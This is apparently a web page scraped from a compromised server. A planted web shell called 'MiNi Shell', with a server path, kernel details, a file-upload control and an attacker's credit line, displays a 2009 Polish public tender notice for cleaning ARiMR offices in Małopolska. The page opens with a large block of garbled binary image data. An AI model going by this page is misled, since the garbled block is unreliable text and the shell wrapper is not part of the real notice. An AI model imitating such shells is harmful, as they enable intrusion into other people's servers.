JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090702/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090702/104363-N-2009.html

<p class="kh_header"><b>Kraków: Usługa sprzątania lokali i terenów zewnętrznych Małopolskiego Oddziału Regionalnego ARiMR i Biur Powiatowych ARiMR w województwie małopolskim</b><br>
<b>Numer ogłoszenia: 104363 - 2009; data zamieszczenia: 02.07.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Małopolski Oddział Regionalny Agencji Restrukturyzacji i Modernizacji Rolnictwa , ul. Lubicz 25, 31-503 Kraków, woj. małopolskie, tel. 012 6298010, faks 012 4211311.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.arimr.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja rządowa centralna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługa sprzątania lokali i terenów zewnętrznych Małopolskiego Oddziału Regionalnego ARiMR i Biur Powiatowych ARiMR w województwie małopolskim.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest usługa kompleksowego sprzatania lokali i terenów zewnętrznych Małopolskiego Oddziału Regionalnego ARiMR i Biur Powiatowych ARiMR w województwie małopolskim..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 90.91.00.00-6, 90.91.12.00-8, 90.91.90.00-2, 90.91.92.00-4, 90.61.10.00-3.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.07.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Wykonawca zobowiązany jest wnieść wadium w wysokości: zadanie I -  2.000 zł. (słownie: dwa tysiące złotych), zadanie II - 400 zł (słownie: czterysta złotych) przed upływem terminu składania ofert, zgodnie z art. 45 ust. 3 ustawy Prawo zamówień publicznych. 
1. 2.   Wadium może być wniesione w:
1.2.1        pieniądzu,
1.2.2        poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym ze poręczenie kasy jest zawsze poręczeniem pieniężnym
1.2.3.    gwarancjach bankowych,
1.2.4        gwarancjach ubezpieczeniowych,
1.2.5        poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2  ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. nr 109, poz. 1158, z póź. zm.).
1. 3.  W przypadku wnoszenia wadium w pieniądzu, kwota wymieniona w punkcie 1 powinna być wniesiona na konto Bank Gospodarki Żywnościowej S.A. Oddz. Kraków 05-2030-0045-1110-0000-0043-7970, z dopiskiem na przelewie: Wadium - przetarg na usługę sprzątania. Dowód wniesienia wadium w postaci dokumentu przelewu należy dołączyć do oferty
1. 4.   Wadium wnoszone w formie innej niż pieniądz musi być ważne przez cały okres związania z ofertą. 
1.5.     Wadium wnoszone w poręczeniach, gwarancjach bankowych, gwarancjach ubezpieczeniowych, poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości należy złożyć w siedzibie prowadzącego postępowanie: 
Małopolski Oddział Regionalny ARiMR, ul. Lubicz 25 31-503 Kraków, nr pokoju 449, a potwierdzenie wniesienia wadium należy dołączyć do oferty. Wadium wniesione w formie poręczeń i gwarancji musi zawierać zobowiązanie do zapłaty kwoty wadium na pierwsze wezwanie Zamawiającego, bez odwołania, bez warunku, niezależnie od zastrzeżeń wykonawcy i bez dochodzenia czy wezwanie Zamawiającego jest uzasadnione czy nie. Dokument wadium musi wyraźnie wskazywać na wszystkie okoliczności określone w art. 46 ust. 4a i 5 ustawy Prawo zamówień publicznych. 
1.6. Zabezpieczenie należytego wykonania umowy nie będzie wymagane<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1. Warunki ogólne

1.1.  Wykonawca nie może podlegać wykluczeniu z ubiegania się o zamówienie publiczne na podstawie art. 24 ust 1 i 2 ustawy według załącznika nr 3 do SIWZ.
1.2.  W przypadku Wykonawców składających wspólną ofertę warunki opisane w pkt 1.1. musi spełniać każdy z Wykonawców składających wspólną ofertę.

2. Warunki szczegółowe podmiotowe (art. 22 ust 1)

2.1.   Posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień
2.2.  Dysponują lub będą dysponować co najmniej 25 osobami zdolnymi do wykonania zamówienia (dotyczy zadania I) albo dysponują lub będą dysponować co najmniej 5 osobami zdolnymi do wykonania zamówienia (dotyczy zadania II).
2.3. dysponują lub będą dysponować, co najmniej:
        a. do zadania I  - kompleksowe sprzątanie pomieszczeń biurowych lokali Biur Powiatowych 
             ARiMR w województwie małopolskim i Małopolskiego Oddziału Regionalnego ARiMR w Krakowie.
- 20 odkurzaczami
- odkurzaczem z filtrem Hepa do odkurzania dokumentów,
- 20 wózkami serwisowymi wyposażonymi w zestawy myjąco-czyszczące
- urządzeniem (odkurzaczem) do prania wykładzin.
       b. do zadania II - utrzymanie czystości terenu zewnętrznego wokół budynków wraz z odśnieżaniem dojścia do niektórych Biur Powiatowych wg wykazu:
- kosiarką do trawy, ręcznym sprzętem do sprzątania i odśnieżania, sprzętem do pielęgnacji zieleni.
2.4.  W ciągu ostatnich trzech lat, a jeżeli okres prowadzenia działalności jest krótszy, w tym okresie wykonali lub wykonują co najmniej 2 usługi, z których każda polegała lub polega na sprzątaniu obiektów użyteczności publicznej lub lokali biurowych o powierzchni co najmniej 6 000 m2 w ramach jednego zlecenia  (dotyczy tylko zadania I).
2.5.	  Znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia
Ocena spełnienie wymaganych warunków wymaganych od Wykonawców zostanie dokonana wg formuły spełnia - nie spełnia. Nie spełnienie chociażby jednego warunku, skutkować będzie wykluczeniem wykonawcy..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> -Oświadczenie o spełnianiu warunków udziału w postępowaniu, na formularzu zgodnym z treścią załącznika nr 3 do niniejszej Specyfikacji Istotnych Warunków Zamówienia.
-Aktualny odpis z właściwego rejestru albo aktualne zaświadczenia o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert
-Aktualne zaświadczenia właściwego naczelnika urzędu skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające odpowiednio, że Wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne lub społeczne, lub zaświadczeń, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawionych nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.

-Wykaz osób i podmiotów, które będą wykonywać zamówienie lub będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nich czynności (Zamawiający wymaga dysponowania przez Wykonawcę co najmniej 25 osobami (zadanie I) lub 5 osobami (zadanie II). W przypadku, gdy Wykonawca wskazał osoby, którymi będzie dysponował - dodatkowo pisemnego zobowiązania innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia
-Wykaz niezbędnych do wykonania zamówienia narzędzi i urządzeń, którymi dysponuje lub będzie dysponował Wykonawca. W przypadku, gdy Wykonawca wskazał narzędzia i urządzenia, którymi będzie dysponował - pisemnego zobowiązania innych podmiotów do udostępnienia niezbędnych do wykonania zamówienia narzędzi i urządzeń, 
-Wykaz wykonanych lub wykonywanych w okresie ostatnich trzech lat usług, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu (powierzchni) dat wykonania i odbiorców oraz załączenia dokumentów potwierdzających, że usługi te zostały wykonane należycie.

-Polisę lub inny dokument ubezpieczenia potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej na kwotę nie mniejszą niż 50 000 zł (słownie: pięćdziesiąt tysięcy złotych).</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.arimr.gov.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Małopolski Oddział Regionalny Agencji Restrukturyzacji i Modernizacji Rolnictwa, ul. Lubicz 25, 31-503 Kraków.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.07.2009 godzina 11:00, miejsce: Małopolski Oddział Regionalny Agencji Restrukturyzacji i Modernizacji Rolnictwa, ul. Lubicz 25, 31-503 Kraków, Dziennik Podawczy, po uprzednim zgłoszeniu się na Punkcie Informacyjnym na IV piętrze..</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Kompleksowe sprzątanie pomieszczeń biurowych lokali Biur Powiatowych ARiMR w województwie małopolskim i Małopolskiego Oddziału Regionalnego ARiMR w Krakowie.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres tej części zamówienia obejmuje czynności:

1.	Codziennie
- oczyszczanie powierzchni biurek, stołów, szaf i szafek (na mokro i wytarcie do sucha) z kurzu i plam,
- opróżnianie worków na śmieci,
- usunięcie worków ze śmieciami,
- założenie nowych worków,
- gruntowne sprzątanie łazienek i sanitariatów (dotyczy Biur Powiatowych Zamawiającego)
- gruntowne sprzątanie (obejmujące zakres czynności wykonywanych 2 razy w tygodniu i raz w tygodniu) w pokojach zajmowanych przez Sekretariat i pokoje Dyrekcji Oddziału Regionalnego Zamawiającego, pow. około 100 m2)
2.	2 razy w tygodniu (poniedziałek, czwartek):

- odkurzenie wykładzin i chodników,
- w razie potrzeby usuwanie plam ze sprzętu i wyposażenia, usuwania zużytego materiału biurowego o rozmiarach przekraczających pojemność koszy na śmieci,
3.	raz w tygodniu (w każdy poniedziałek, w przypadku dnia wolnego od pracy - w czwartek):
- przetarcie koszy na śmieci zewnątrz i wewnątrz,
- wyczyszczenie i wypolerowanie wszelkich polerowanych części mebli i wyposażenia,
- gruntowne umycie drzwi,
- sprzątanie pomieszczenia socjalnego, w tym mycie szafek, zlewozmywaków, kuchenki mikrofalowej
- oczyszczenie z kurzu zegarów i ram obrazów,
- sprzątanie w obecności pracownika pomieszczeń archiwum i składnicy akt (bez odkurzania akt),
- mycie luster,
- oczyszczanie z kurzu tablic, lamp na biurkach, parapetów okiennych, telefonów i sprzętu komputerowego. Czyszczenie sprzętu winno odbywać się przy użyciu specjalnie do tego przeznaczonych środków. Na wyposażeniu znajdują się monitory LCD i szklane

4.	raz na trzy miesiące:

- rozmrożenie i umycie lodówek 
- umycie regałów w składnicach akt i archiwum zakładowym

5.	raz na pół roku 

- mycie okien wraz z jednoczesnym praniem firan i czyszczeniem zasłon oraz czyszczenie żaluzji pionowych i poziomych (w listopadzie 2009 oraz maju 2010 r.) 
- odkurzanie akt w archiwach i składnicach akt odkurzaczem z filtrem Hepa (na wezwanie Zamawiającego, po indywidualnym uzgodnieniu terminu z właściwym Kierownikiem Biura Powiatowego lub Kierownikiem Biura Oddziału Regionalnego)
- sprzątanie pomieszczenia magazynu opon

6.	raz w roku

- gruntowne oczyszczanie mebli tapicerowanych na mokro,
- czyszczenie wykładzin na mokro

7.	w miarę potrzeb (dotyczy biur powiatowych Zamawiającego):

-	wyposażanie sanitariatów w środki zapachowe, papier toaletowy, ręczniki papierowe, mydło toaletowe posiadające stosowne atesty dopuszczające do stosowania w standardzie dla budynków użyteczności publicznej (środki higieniczne zapewnia Wykonawca). 
8.	w miarę potrzeb (dotyczy biur powiatowych i Oddziału Regionalnego Zamawiającego):
- opróżnianie pojemników niszczarek.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.91.00.00-6, 90.91.12.00-8, 90.91.90.00-2, 90.91.92.00-4.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.07.2010.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Usługa kompleksowego utrzymania czystości terenu zewnętrznego wokół budynków wraz z odśnieżaniem dojścia do niektórych Biur Powiatowych.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres tej części zamówienia obejmuje: 


1. raz w tygodniu usuwanie nieczystości terenów utwardzonych i trawników,
2.	 raz w tygodniu zamiatanie terenów utwardzonych,
3.	 raz w tygodniu oczyszczanie popielnic, koszy na śmieci i wycieraczek zewnętrznych,
4	w okresie wiosennym (czerwiec), letnim (sierpień) i jesiennym (wrzesień) koszenie trawników (łącznie trzykrotne), przycinanie drzew i krzewów (jednokrotne, w okresie wiosennym),
5.	w okresie jesiennym - raz w tygodniu usuwanie opadłych liści z terenów utwardzonych i trawników oraz ich wywóz,
6.	w okresie zimowym - systematyczne odśnieżanie i zabezpieczenie przed oblodzeniem (przez posypywanie mieszanką solno- piaskową lub samym piaskiem, materiał zapewnia Wykonawca) terenów utwardzonych - ciągów pieszych, strącanie sopli zwisających z dachu, zabezpieczenie przejść pod soplami zwisającymi z dachu.
7.	w miarę potrzeb obsiewanie ubytków w trawnikach (materiał siewny Wykonawcy).

Wymienione wyżej prace wykonać należy codziennie, pomiędzy godzinami 7:00 a 16:00 oraz w okresie wzmożonych opadów śniegu na telefoniczne wezwanie Zamawiającego w ciągu godziny od powiadomienia..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.91.00.00-6, 90.61.10.00-3.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.07.2010.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com